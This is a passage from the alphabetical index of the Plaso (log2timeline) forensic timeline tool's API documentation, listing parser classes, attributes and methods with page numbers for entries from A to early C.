application (plaso.parsers.esedb_plugins.srum.SRUMNetworkDataUsageEventDataattribute), 232
application (plaso.parsers.sqlite_plugins.appusage.MacOSApplicationUsageEventDataattribute), 254
application (plaso.parsers.winjob.WinJobEventDataattribute), 428
application (plaso.parsers.winreg_plugins.winlogon.WinlogonEventDataattribute), 325
application_display_name(plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelineGenericEventDataattribute), 291
application_focus_count(plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryEventDataattribute), 323
application_focus_duration(plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryEventDataattribute), 323
application_name (plaso.parsers.trendmicroav.TrendMicroUrlEventDataattribute), 419
ApplicationUsagePlugin (class inplaso.parsers.sqlite_plugins.appusage), 254
APTHistoryLogEventData (class inplaso.parsers.apt_history), 331
APTHistoryLogParser (class inplaso.parsers.apt_history), 331
arg_url (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventDataattribute), 257
args (plaso.filters.expressions.Expression attribute),155
args (plaso.filters.filters.Filter attribute), 160
args (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventData attribute), 257
ArgumentHelperManager (class in plaso.cli.helpers.manager), 70
ArgumentsHelper (class in plaso.cli.helpers.interface), 69
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.interface.ArtifactPreprocessorPlugin attribute), 437
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.linux.LinuxDistributionPluginattribute), 439
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.linux.LinuxHostnamePluginattribute), 439
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.linux.LinuxIssueFilePluginattribute), 439
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.linux.LinuxStandardBaseReleasePluginattribute), 439
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.linux.LinuxSystemdOperatingSystemPluginattribute), 439
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.linux.LinuxTimeZonePluginattribute), 439
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.linux.LinuxUserAccountsPluginattribute), 439
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.macos.MacOSHostnamePluginattribute), 440
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.macos.MacOSKeyboardLayoutPluginattribute), 440
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.macos.MacOSSystemVersionPluginattribute), 440
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.macos.MacOSTimeZonePluginattribute), 440
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.macos.MacOSUserAccountsPluginattribute), 440
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsAllUsersProfileEnvironmentVariablePluginattribute), 442
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsAvailableTimeZonesPluginattribute), 442
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsCodepagePluginattribute), 442
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsHostnamePluginattribute), 443
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsProgramDataEnvironmentVariablePluginattribute), 443
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsProgramFilesEnvironmentVariablePluginattribute), 443
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsProgramFilesX86EnvironmentVariablePluginattribute), 443
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsSystemProductPluginattribute), 443
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsSystemRootEnvironmentVariablePluginattribute), 443
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsSystemVersionPluginattribute), 444
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsTimeZonePluginattribute), 444
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsUserAccountsPluginattribute), 444
ARTIFACT_DEFINITION_NAME(plaso.preprocessors.windows.WindowsWinDirEnvironmentVariablePluginattribute), 444
artifact_filters (plaso.containers.sessions.Sessionattribute), 110
artifact_filters (plaso.containers.sessions.SessionConfigurationattribute), 113
artifact_filters (plaso.engine.configurations.ProcessingConfigurationattribute), 122
ArtifactAttributeContainer (class inplaso.containers.artifacts), 98
ArtifactDefinitionsArgumentsHelper (classin plaso.cli.helpers.artifact_definitions), 62
ArtifactDefinitionsFiltersHelper (class inplaso.engine.artifact_filters), 120
ArtifactFiltersArgumentsHelper (class inplaso.cli.helpers.artifact_filters), 63
ArtifactPreprocessorPlugin (class inplaso.preprocessors.interface), 437
ASLEventData (class in plaso.parsers.asl), 332
ASLFormatter (class in plaso.formatters.asl), 166
ASLParser (class in plaso.parsers.asl), 333
attachment_location (plaso.parsers.sqlite_plugins.imessage.IMessageEventData attribute), 269
attribute (plaso.filters.expressions.Expressionattribute), 155, 156
attribute_data_type(plaso.parsers.mac_keychain.KeychainDatabaseColumnattribute), 360
attribute_identifier(plaso.parsers.mac_keychain.KeychainDatabaseColumnattribute), 360
ATTRIBUTE_NAME (plaso.analyzers.hashers.entropy.EntropyHasherattribute), 54
ATTRIBUTE_NAME (plaso.analyzers.hashers.interface.BaseHasherattribute), 55
ATTRIBUTE_NAME (plaso.analyzers.hashers.md5.MD5Hasherattribute), 57
ATTRIBUTE_NAME (plaso.analyzers.hashers.sha1.SHA1Hasherattribute), 57
ATTRIBUTE_NAME (plaso.analyzers.hashers.sha256.SHA256Hasherattribute), 58
attribute_name (plaso.containers.analyzer_result.AnalyzerResultattribute), 97
attribute_name (plaso.parsers.mac_keychain.KeychainDatabaseColumnattribute), 360
attribute_type (plaso.parsers.ntfs.NTFSFileStatEventDataattribute), 377
attribute_value (plaso.containers.analyzer_result.AnalyzerResultattribute), 97
attribute_values_hash (plaso.storage.identifiers.FakeIdentifier attribute), 478
AttributeContainer (class inplaso.containers.interface), 106
AttributeContainerIdentifier (class inplaso.containers.interface), 107
AttributeContainerSerializer (class inplaso.serializer.interface), 444
AttributeContainersManager (class inplaso.containers.manager), 107
attributes (plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItemattribute), 403
audit_type (plaso.parsers.selinux.SELinuxLogEventDataattribute), 397
authentication_method(plaso.parsers.syslog_plugins.ssh.SSHEventDataattribute), 295
author (plaso.parsers.czip_plugins.oxml.OpenXMLEventDataattribute), 223
author_identifier(plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidStatusEventDataattribute), 288
AutomaticDestinationsDestListEntryEventData(class in plaso.parsers.olecf_plugins.automatic_destinations),234
AutomaticDestinationsOLECFPlugin (class inplaso.parsers.olecf_plugins.automatic_destinations),234
AutoRunsPlugin (class inplaso.parsers.winreg_plugins.run), 314
available_time_zones(plaso.containers.artifacts.SystemConfigurationArtifactattribute), 100
available_time_zones()(plaso.engine.knowledge_base.KnowledgeBaseproperty), 131
B
background_bytes_read (plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventData attribute), 230
background_bytes_written(plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataattribute), 230
background_context_switches(plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataattribute), 230
background_cycle_time(plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataattribute), 230
background_number_for_flushes(plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataattribute), 230
background_number_for_read_operations(plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataattribute), 230
background_number_for_write_operations(plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataattribute), 230
BackgroundActivityModeratorEventData(class in plaso.parsers.winreg_plugins.bam),298
BackgroundActivityModeratorWindowsRegistryPlugin(class in plaso.parsers.winreg_plugins.bam),298
backup_id (plaso.parsers.symantec.SymantecEventDataattribute), 407
BadConfigObject, 184
BadConfigOption, 184
BagMRUEventData (class in plaso.parsers.winreg_plugins.bagmru), 297
BagMRUWindowsRegistryPlugin (class in plaso.parsers.winreg_plugins.bagmru), 297
BaseAnalyzer (class in plaso.analyzers.interface), 59
BaseChromeCookiePlugin (class in plaso.parsers.sqlite_plugins.chrome_cookies), 256
BaseCookiePlugin (class in plaso.parsers.cookie_plugins.interface), 220
BaseEngine (class in plaso.engine.engine), 124
BaseFileEntryFilter (class in plaso.parsers.interface), 355
BaseFirefoxCacheParser (class in plaso.parsers.firefox_cache), 349
BaseGoogleChromeHistoryPlugin (class in plaso.parsers.sqlite_plugins.chrome_history), 258
BaseHasher (class in plaso.analyzers.hashers.interface), 55
BaseMRUListExWindowsRegistryPlugin (class in plaso.parsers.winreg_plugins.mrulistex), 307
BaseMRUListWindowsRegistryPlugin (class in plaso.parsers.winreg_plugins.mrulist), 305
BaseParser (class in plaso.parsers.interface), 355
BasePlugin (class in plaso.parsers.plugins), 384
BasePluginCache (class in plaso.parsers.plugins), 385
BaseStorageFile (class in plaso.storage.file_interface), 469
BaseStore (class in plaso.storage.interface), 479
BaseTableView (class in plaso.cli.views), 96
BaseWindowsRegistryKeyFilter (class in plaso.parsers.winreg_plugins.interface), 301
BashHistoryEventData (class in plaso.parsers.bash_history), 334
BashHistoryParser (class in plaso.parsers.bash_history), 334
BENCODE_KEYS (plaso.parsers.bencode_plugins.interface.BencodePlugin attribute), 215
BENCODE_KEYS (plaso.parsers.bencode_plugins.transmission.TransmissionPlugin attribute), 216
BENCODE_KEYS (plaso.parsers.bencode_plugins.utorrent.UTorrentPlugin attribute), 217
BencodeParser (class in plaso.parsers.bencode_parser), 335
BencodePlugin (class in plaso.parsers.bencode_plugins.interface), 215
BINARY_DATA_COLUMN_TYPES(plaso.parsers.esedb_plugins.interface.ESEDBPluginattribute), 226
binary_path (plaso.parsers.winreg_plugins.bam.BackgroundActivityModeratorEventDataattribute), 298
BinaryCookieParser (class inplaso.parsers.safari_cookies), 391
BinaryDSVReader (class inplaso.lib.line_reader_file), 187
BinaryExpression (class inplaso.filters.expressions), 154
BinaryLineReader (class inplaso.lib.line_reader_file), 187
BinaryOperator (class in plaso.filters.filters), 159
birth_droid_file_identifier (plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsDestListEntryEventData attribute), 234
birth_droid_file_identifier(plaso.parsers.winlnk.WinLnkLinkEventDataattribute), 429
birth_droid_volume_identifier(plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsDestListEntryEventDataattribute), 234
birth_droid_volume_identifier(plaso.parsers.winlnk.WinLnkLinkEventDataattribute), 429
birthday (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidContactEventDataattribute), 284
BLANK (plaso.parsers.iis.WinIISParser attribute), 354
block_mode (plaso.parsers.trendmicroav.TrendMicroUrlEventData attribute), 419
block_number (plaso.parsers.chrome_cache.CacheAddress attribute), 336
block_offset (plaso.parsers.chrome_cache.CacheAddress attribute), 336
block_size (plaso.parsers.chrome_cache.CacheAddressattribute), 336
BluetoothPlugin (class inplaso.parsers.plist_plugins.bluetooth), 239
body (plaso.parsers.dpkg.DpkgEventData attribute),344
body (plaso.parsers.selinux.SELinuxLogEventData attribute), 397
body (plaso.parsers.sqlite_plugins.android_sms.AndroidSMSEventDataattribute), 251
body (plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessageDataattribute), 268
body (plaso.parsers.sqlite_plugins.kik_ios.KikIOSMessageEventDataattribute), 271
body (plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterEventDataattribute), 276
body (plaso.parsers.syslog.SyslogCommentEventDataattribute), 411
body (plaso.parsers.syslog.SyslogLineEventData attribute), 411
body (plaso.parsers.systemd_journal.SystemdJournalEventDataattribute), 413
BootExecutePlugin (class inplaso.parsers.winreg_plugins.lfu), 303
BootVerificationPlugin (class inplaso.parsers.winreg_plugins.lfu), 303
BrowserSearchPlugin (class inplaso.analysis.browser_search), 39
bsd_name (plaso.parsers.santa.SantaMountEventDataattribute), 394
BSMEventData (class in plaso.parsers.bsm), 335
BSMParser (class in plaso.parsers.bsm), 335
BUFFER_SIZE (plaso.parsers.gdrive_synclog.GoogleDriveSyncLogParser attribute), 352
BUFFER_SIZE (plaso.parsers.sccm.SCCMParser attribute), 396
BUFFER_SIZE (plaso.parsers.text_parser.PyparsingMultiLineTextParser attribute), 415
build_number (plaso.parsers.winreg_plugins.windows_version.WindowsRegistryInstallationEventData attribute), 324
BuildArtifactsRegistry() (plaso.engine.engine.BaseEngine class method), 125
BuildCollectionFilters() (plaso.engine.engine.BaseEngine method), 125
BuildFindSpecs() (plaso.engine.artifact_filters.ArtifactDefinitionsFiltersHelper method), 120
BuildFindSpecs() (plaso.engine.path_filters.PathCollectionFiltersHelper method), 132
bundle_id (plaso.parsers.sqlite_plugins.appusage.MacOSApplicationUsageEventData attribute), 254
bundle_identifier (plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCApplicationEventData attribute), 274
bundle_identifier (plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCSafariEventData attribute), 275
bundle_name (plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterEventDataattribute), 276
bus (plaso.parsers.santa.SantaMountEventData attribute), 395
bytes_received (plaso.parsers.esedb_plugins.srum.SRUMNetworkDataUsageEventDataattribute), 232
bytes_sent (plaso.parsers.esedb_plugins.srum.SRUMNetworkDataUsageEventDataattribute), 232
C
cache_directory_index (plaso.parsers.msiecf.MSIECFLeakEventData attribute), 374
cache_directory_index(plaso.parsers.msiecf.MSIECFURLEventDataattribute), 375
cache_directory_name(plaso.parsers.msiecf.MSIECFLeakEventDataattribute), 374
cache_directory_name(plaso.parsers.msiecf.MSIECFURLEventDataattribute), 375
cache_identifier (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventDataattribute), 227
CacheAddress (class in plaso.parsers.chrome_cache),336
cached_file_size (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventDataattribute), 227
cached_file_size (plaso.parsers.msiecf.MSIECFLeakEventDataattribute), 374
cached_file_size (plaso.parsers.msiecf.MSIECFURLEventDataattribute), 375
cached_filename (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventDataattribute), 227
cached_filename (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheLeakFilesEventDataattribute), 229
cached_filename (plaso.parsers.msiecf.MSIECFLeakEventDataattribute), 374
cached_filename (plaso.parsers.msiecf.MSIECFURLEventDataattribute), 375
CacheEntry (class in plaso.parsers.chrome_cache),336
CacheQueryResults()(plaso.parsers.sqlite.SQLiteCache method),404
call_type (plaso.parsers.sqlite_plugins.android_calls.AndroidCallEventDataattribute), 250
CALL_TYPE (plaso.parsers.sqlite_plugins.android_calls.AndroidCallPluginattribute), 251
call_type (plaso.parsers.sqlite_plugins.skype.SkypeCallEventDataattribute), 281
caller (plaso.parsers.mac_securityd.MacOSSecuritydLogEventDataattribute), 362
CallFunction() (plaso.multi_processing.plaso_xmlrpc.XMLRPCClientmethod), 192
CallFunction() (plaso.multi_processing.rpc.RPCClientmethod), 195
caption (plaso.parsers.bencode_plugins.utorrent.UTorrentEventDataattribute), 217
case_sensitive (plaso.containers.artifacts.EnvironmentVariableArtifactattribute), 98
cat (plaso.parsers.symantec.SymantecEventDataattribute), 407
CATEGORY (plaso.cli.helpers.dynamic_output.DynamicOutputArgumentsHelperattribute), 65
CATEGORY (plaso.cli.helpers.elastic_output.ElasticSearchOutputArgumentsHelperattribute), 66
CATEGORY (plaso.cli.helpers.interface.ArgumentsHelperattribute), 69
CATEGORY (plaso.cli.helpers.nsrlsvr_analysis.NsrlsvrAnalysisArgumentsHelperattribute), 71
CATEGORY (plaso.cli.helpers.sessionize_analysis.SessionizeAnalysisArgumentsHelperattribute), 75
CATEGORY (plaso.cli.helpers.tagging_analysis.TaggingAnalysisArgumentsHelperattribute), 77
CATEGORY (plaso.cli.helpers.timesketch_output.TimesketchOutputArgumentsHelperattribute), 79
CATEGORY (plaso.cli.helpers.viper_analysis.ViperAnalysisArgumentsHelperattribute), 80
CATEGORY (plaso.cli.helpers.virustotal_analysis.VirusTotalAnalysisArgumentsHelperattribute), 81
CATEGORY (plaso.cli.helpers.windows_services_analysis.WindowsServicesAnalysisArgumentsHelperattribute), 82
CATEGORY (plaso.cli.helpers.xlsx_output.XLSXOutputArgumentsHelperattribute), 83
CCleanerConfigurationEventData (class inplaso.parsers.winreg_plugins.ccleaner), 299
CCleanerPlugin (class inplaso.parsers.winreg_plugins.ccleaner),299
CCleanerUpdateEventData (class inplaso.parsers.winreg_plugins.ccleaner),299
certificate_common_name(plaso.parsers.santa.SantaExecutionEventDataattribute), 392
certificate_hash (plaso.parsers.santa.SantaExecutionEventDataattribute), 392
CheckDependencies() (in moduleplaso.dependencies), 491
CheckFilterExpression()(plaso.parsers.manager.ParsersManagerclass method), 366
CheckKeyCompatibility()(plaso.engine.artifact_filters.ArtifactDefinitionsFiltersHelperclass method), 121
CheckOutDated() (plaso.cli.tools.CLITool method),94
CheckPath() (plaso.filters.path_filter.PathFilterScanTreemethod), 165
CheckSchema() (plaso.parsers.sqlite_plugins.interface.SQLitePluginmethod), 270
CheckSupportedFormat()(plaso.storage.sqlite.sqlite_file.SQLiteStorageFileclass method), 463
CheckTaskReadyForMerge()(plaso.storage.fake.writer.FakeStorageWritermethod), 448
CheckTaskReadyForMerge()(plaso.storage.interface.StorageWritermethod), 488
CheckTaskReadyForMerge()(plaso.storage.redis.writer.RedisStorageWritermethod), 458
CheckTaskReadyForMerge()(plaso.storage.sqlite.writer.SQLiteStorageFileWritermethod), 465
CheckTaskToMerge()(plaso.multi_processing.task_manager.TaskManagermethod), 196
Chrome17CookiePlugin (class inplaso.parsers.sqlite_plugins.chrome_cookies),256
Chrome66CookiePlugin (class inplaso.parsers.sqlite_plugins.chrome_cookies),256
ChromeAutofillEventData (class inplaso.parsers.sqlite_plugins.chrome_autofill),255
ChromeAutofillPlugin (class inplaso.parsers.sqlite_plugins.chrome_autofill),255
ChromeCacheDataBlockFileParser (class inplaso.parsers.chrome_cache), 337
ChromeCacheEntryEventData (class inplaso.parsers.chrome_cache), 337
ChromeCacheIndexFileParser (class inplaso.parsers.chrome_cache), 338
ChromeCacheParser (class inplaso.parsers.chrome_cache), 338
ChromeContentSettingsExceptionsEventData(class in plaso.parsers.chrome_preferences),339
ChromeContentSettingsExceptionsFormatter(class in plaso.formatters.chrome_preferences),167
ChromeCookieEventData (class in plaso.parsers.sqlite_plugins.chrome_cookies), 256
ChromeExtensionActivityEventData (class inplaso.parsers.sqlite_plugins.chrome_extension_activity),257
ChromeExtensionActivityPlugin (class inplaso.parsers.sqlite_plugins.chrome_extension_activity),258
ChromeExtensionInstallationEventData(class in plaso.parsers.chrome_preferences),339
ChromeExtensionPlugin (class inplaso.analysis.chrome_extension), 40
ChromeExtensionsAutoupdaterEventData(class in plaso.parsers.chrome_preferences),339
ChromeHistoryFileDownloadedEventData(class in plaso.parsers.sqlite_plugins.chrome_history),259
ChromeHistoryPageVisitedEventData (classin plaso.parsers.sqlite_plugins.chrome_history),259
ChromePageVisitedFormatter (class inplaso.formatters.chrome), 167
ChromePreferencesClearHistoryEventData(class in plaso.parsers.chrome_preferences),339
ChromePreferencesParser (class inplaso.parsers.chrome_preferences), 340
CircularBuffer (class in plaso.lib.bufferlib), 183
cleaninfo (plaso.parsers.symantec.SymantecEventData attribute), 407
Clear() (plaso.lib.bufferlib.CircularBuffer method), 183
ClearEventAttributes() (plaso.parsers.mediator.ParserMediator method), 370
ClearParserChain() (plaso.parsers.mediator.ParserMediator method), 370
client (plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCEntry attribute), 279
clientgroup (plaso.parsers.symantec.SymantecEventData attribute), 407
CLIInputReader (class in plaso.cli.tools), 93
CLIOutputWriter (class in plaso.cli.tools), 93
CLITableView (class in plaso.cli.views), 96
CLITabularTableView (class in plaso.cli.views), 96
CLITool (class in plaso.cli.tools), 93
Close() (plaso.engine.plaso_queue.Queue method), 134
Close() (plaso.engine.zeromq_queue.ZeroMQBufferedQueue method), 147
Close() (plaso.engine.zeromq_queue.ZeroMQQueue method), 150
Close() (plaso.formatters.winevt_rc.Sqlite3DatabaseFile method), 179
Close() (plaso.formatters.winevt_rc.Sqlite3DatabaseReader method), 180
Close() (plaso.multi_processing.plaso_xmlrpc.XMLRPCClient method), 193
Close() (plaso.multi_processing.rpc.RPCClient method), 195
Close() (plaso.output.interface.LinearOutputModule method), 201
Close() (plaso.output.interface.OutputModule method), 201
Close() (plaso.output.shared_elastic.SharedElasticsearchOutputModule method), 211
Close() (plaso.output.timesketch_out.TimesketchOutputModule method), 213
Close() (plaso.output.xlsx.XLSXOutputModule method), 214
Close() (plaso.parsers.sqlite.SQLiteDatabase method), 405
Close() (plaso.storage.fake.writer.FakeStorageWriter method), 448
Close() (plaso.storage.file_interface.StorageFileReader method), 470
Close() (plaso.storage.file_interface.StorageFileWriter method), 474
Close() (plaso.storage.interface.BaseStore method), 480
Close() (plaso.storage.interface.StorageReader method), 484
Close() (plaso.storage.interface.StorageWriter method), 488
Close() (plaso.storage.redis.reader.RedisStorageReader method), 452
Close() (plaso.storage.redis.redis_store.RedisStore method), 455
Close() (plaso.storage.redis.writer.RedisStorageWriter method), 458
Close() (plaso.storage.sqlite.sqlite_file.SQLiteStorageFile method), 464
CLOUD_PATH_CACHE_QUERY (plaso.parsers.sqlite_plugins.gdrive.GoogleDrivePlugin attribute), 266
code_page (plaso.containers.artifacts.SystemConfigurationArtifactattribute), 100
codepage() (plaso.engine.knowledge_base.KnowledgeBaseproperty), 131
codepage() (plaso.parsers.mediator.ParserMediatorproperty), 373
Collect() (plaso.preprocessors.interface.FileSystemArtifactPreprocessorPluginmethod), 438
Collect() (plaso.preprocessors.interface.KnowledgeBasePreprocessorPluginmethod), 438
Collect() (plaso.preprocessors.interface.WindowsRegistryKeyArtifactPreprocessorPluginmethod), 438
Collect() (plaso.preprocessors.windows.WindowsAllUsersAppDataKnowledgeBasePluginmethod), 442
Collect() (plaso.preprocessors.windows.WindowsAllUsersAppProfileKnowledgeBasePluginmethod), 442
Collect() (plaso.preprocessors.windows.WindowsProgramDataKnowledgeBasePluginmethod), 443
CollectFromFileSystem()(plaso.preprocessors.manager.PreprocessPluginsManagerclass method), 440
CollectFromKnowledgeBase()(plaso.preprocessors.manager.PreprocessPluginsManagerclass method), 441
CollectFromWindowsRegistry()(plaso.preprocessors.manager.PreprocessPluginsManagerclass method), 441
collection_filters_helper(plaso.engine.engine.BaseEngine attribute),124
collection_filters_helper(plaso.parsers.mediator.ParserMediatorattribute), 369
CollectionFiltersHelper (class inplaso.engine.filters_helper), 128
COLUMNS (plaso.parsers.dsv_parser.DSVParser at-tribute), 345
columns (plaso.parsers.mac_keychain.KeychainDatabaseTableattribute), 360
COLUMNS (plaso.parsers.mactime.MactimeParserattribute), 365
COLUMNS (plaso.parsers.mcafeeav.McafeeAccessProtectionParserattribute), 369
COLUMNS (plaso.parsers.networkminer.NetworkMinerParserattribute), 377
COLUMNS (plaso.parsers.symantec.SymantecParser at-tribute), 411
COLUMNS (plaso.parsers.trendmicroav.OfficeScanVirusDetectionParserattribute), 417
COLUMNS (plaso.parsers.trendmicroav.OfficeScanWebReputationParserattribute), 418
COLUMNS (plaso.parsers.trendmicroav.TrendMicroBaseParserattribute), 419
command (plaso.parsers.apt_history.APTHistoryLogEventDataattribute), 331
command (plaso.parsers.bash_history.BashHistoryEventDataattribute), 334
command (plaso.parsers.docker.DockerJSONLayerEventDataattribute), 343
command (plaso.parsers.syslog_plugins.cron.CronTaskRunEventDataattribute), 294
command (plaso.parsers.winreg_plugins.winlogon.WinlogonEventDataattribute), 325
command (plaso.parsers.zsh_extended_history.ZshHistoryEventData
Index 511
Plaso (log2timeline), Release 20201007
attribute), 437command_line_arguments
(plaso.containers.sessions.Session attribute),110
command_line_arguments(plaso.containers.sessions.SessionConfigurationattribute), 113
command_line_arguments(plaso.parsers.winlnk.WinLnkLinkEventDataattribute), 429
COMMENT (plaso.parsers.iis.WinIISParser attribute), 354
COMMENT_LINE_HASH (plaso.parsers.text_parser.PyparsingConstants attribute), 415
comments (plaso.parsers.mac_keychain.KeychainApplicationRecordEventData attribute), 359
comments (plaso.parsers.mac_keychain.KeychainInternetRecordEventData attribute), 360
comments (plaso.parsers.winreg_plugins.sam_users.SAMUsersWindowsRegistryEventData attribute), 314
company_name (plaso.parsers.amcache.AMCacheFileEventData attribute), 326
compare_storage_information (plaso.cli.pinfo_tool.PinfoTool attribute), 87
CompareExpression() (plaso.filters.expression_parser.Token method), 154
CompareStores() (plaso.cli.pinfo_tool.PinfoTool method), 87
Compile() (plaso.filters.expressions.BinaryExpression method), 155
Compile() (plaso.filters.expressions.EventExpression method), 155
Compile() (plaso.filters.expressions.Expression method), 156
Compile() (plaso.filters.expressions.IdentityExpression method), 156
compiled_re (plaso.filters.filters.Regexp attribute), 162
CompileFilter() (plaso.filters.event_filter.EventObjectFilter method), 152
CompileFilter() (plaso.filters.interface.FilterObject method), 162
CompileReport() (plaso.analysis.browser_search.BrowserSearchPlugin method), 39
CompileReport() (plaso.analysis.chrome_extension.ChromeExtensionPlugin method), 40
CompileReport() (plaso.analysis.file_hashes.FileHashesPlugin method), 41
CompileReport() (plaso.analysis.hash_tagging.HashTaggingAnalysisPlugin method), 43
CompileReport() (plaso.analysis.interface.AnalysisPlugin method), 44
CompileReport() (plaso.analysis.sessionize.SessionizeAnalysisPlugin method), 49
CompileReport() (plaso.analysis.tagging.TaggingAnalysisPlugin method), 49
CompileReport() (plaso.analysis.unique_domains_visited.UniqueDomainsVisitedPlugin method), 50
CompileReport() (plaso.analysis.windows_services.WindowsServicesAnalysisPlugin method), 53
CompleteTask() (plaso.multi_processing.task_manager.TaskManager method), 197
completion_time (plaso.containers.sessions.Session attribute), 110
completion_time (plaso.containers.tasks.Task attribute), 115
component (plaso.parsers.android_app_usage.AndroidAppUsageEventData attribute), 329
component (plaso.parsers.sccm.SCCMLogEventData attribute), 396
CompoundZIPParser (class in plaso.parsers.czip), 342
CompoundZIPPlugin (class in plaso.parsers.czip_plugins.interface), 222
compressed (plaso.parsers.symantec.SymantecEventData attribute), 407
CompressedFileHandler (class in plaso.lib.loggers), 188
computer (plaso.parsers.symantec.SymantecEventData attribute), 407
computer_name (plaso.parsers.asl.ASLEventData attribute), 332
computer_name (plaso.parsers.cups_ipp.CupsIppEventData attribute), 340
computer_name (plaso.parsers.mac_appfirewall.MacAppFirewallLogEventData attribute), 358
computer_name (plaso.parsers.winevt.WinEvtRecordEventData attribute), 423
computer_name (plaso.parsers.winevtx.WinEvtxRecordEventData attribute), 425
ConditionalEventFormatter (class in plaso.formatters.interface), 170
configuration (plaso.parsers.winreg_plugins.ccleaner.CCleanerConfigurationEventData attribute), 299
configuration (plaso.parsers.winreg_plugins.timezone.WindowsTimezoneSettingsEventData attribute), 319
ConfigureLogging() (in module plaso.lib.loggers), 188
connection_type (plaso.parsers.winreg_plugins.networks.WindowsRegistryNetworkListEventData attribute), 311
ConnectionError, 184
container_id (plaso.parsers.docker.DockerJSONContainerEventData attribute), 342
container_id (plaso.parsers.docker.DockerJSONContainerLogEventData attribute), 343
container_identifier (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventData attribute), 227
container_identifier (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainersEventData attribute), 228
container_name (plaso.parsers.docker.DockerJSONContainerEventData attribute), 342
CONTAINER_TYPE (plaso.containers.analyzer_result.AnalyzerResult attribute), 98
CONTAINER_TYPE (plaso.containers.artifacts.EnvironmentVariableArtifact attribute), 98
CONTAINER_TYPE (plaso.containers.artifacts.HostnameArtifact attribute), 98
CONTAINER_TYPE (plaso.containers.artifacts.OperatingSystemArtifact attribute), 99
CONTAINER_TYPE (plaso.containers.artifacts.SourceConfigurationArtifact attribute), 100
CONTAINER_TYPE (plaso.containers.artifacts.SystemConfigurationArtifact attribute), 100
CONTAINER_TYPE (plaso.containers.artifacts.TimeZoneArtifact attribute), 101
CONTAINER_TYPE (plaso.containers.artifacts.UserAccountArtifact attribute), 101
CONTAINER_TYPE (plaso.containers.event_sources.EventSource attribute), 102
CONTAINER_TYPE (plaso.containers.events.EventData attribute), 103
CONTAINER_TYPE (plaso.containers.events.EventDataStream attribute), 104
CONTAINER_TYPE (plaso.containers.events.EventObject attribute), 104
CONTAINER_TYPE (plaso.containers.events.EventTag attribute), 105
CONTAINER_TYPE (plaso.containers.interface.AttributeContainer attribute), 106
CONTAINER_TYPE (plaso.containers.reports.AnalysisReport attribute), 109
CONTAINER_TYPE (plaso.containers.sessions.Session attribute), 111
CONTAINER_TYPE (plaso.containers.sessions.SessionCompletion attribute), 112
CONTAINER_TYPE (plaso.containers.sessions.SessionConfiguration attribute), 113
CONTAINER_TYPE (plaso.containers.sessions.SessionStart attribute), 114
CONTAINER_TYPE (plaso.containers.storage_media.MountPoint attribute), 115
CONTAINER_TYPE (plaso.containers.tasks.Task attribute), 116
CONTAINER_TYPE (plaso.containers.tasks.TaskCompletion attribute), 117
CONTAINER_TYPE (plaso.containers.tasks.TaskStart attribute), 117
CONTAINER_TYPE (plaso.containers.warnings.ExtractionError attribute), 118
CONTAINER_TYPE (plaso.containers.warnings.ExtractionWarning attribute), 119
CONTAINER_TYPE (plaso.engine.configurations.CredentialConfiguration attribute), 121
CONTAINER_TYPE (plaso.engine.configurations.EventExtractionConfiguration attribute), 121
CONTAINER_TYPE (plaso.engine.configurations.ExtractionConfiguration attribute), 122
CONTAINER_TYPE (plaso.engine.configurations.ProcessingConfiguration attribute), 123
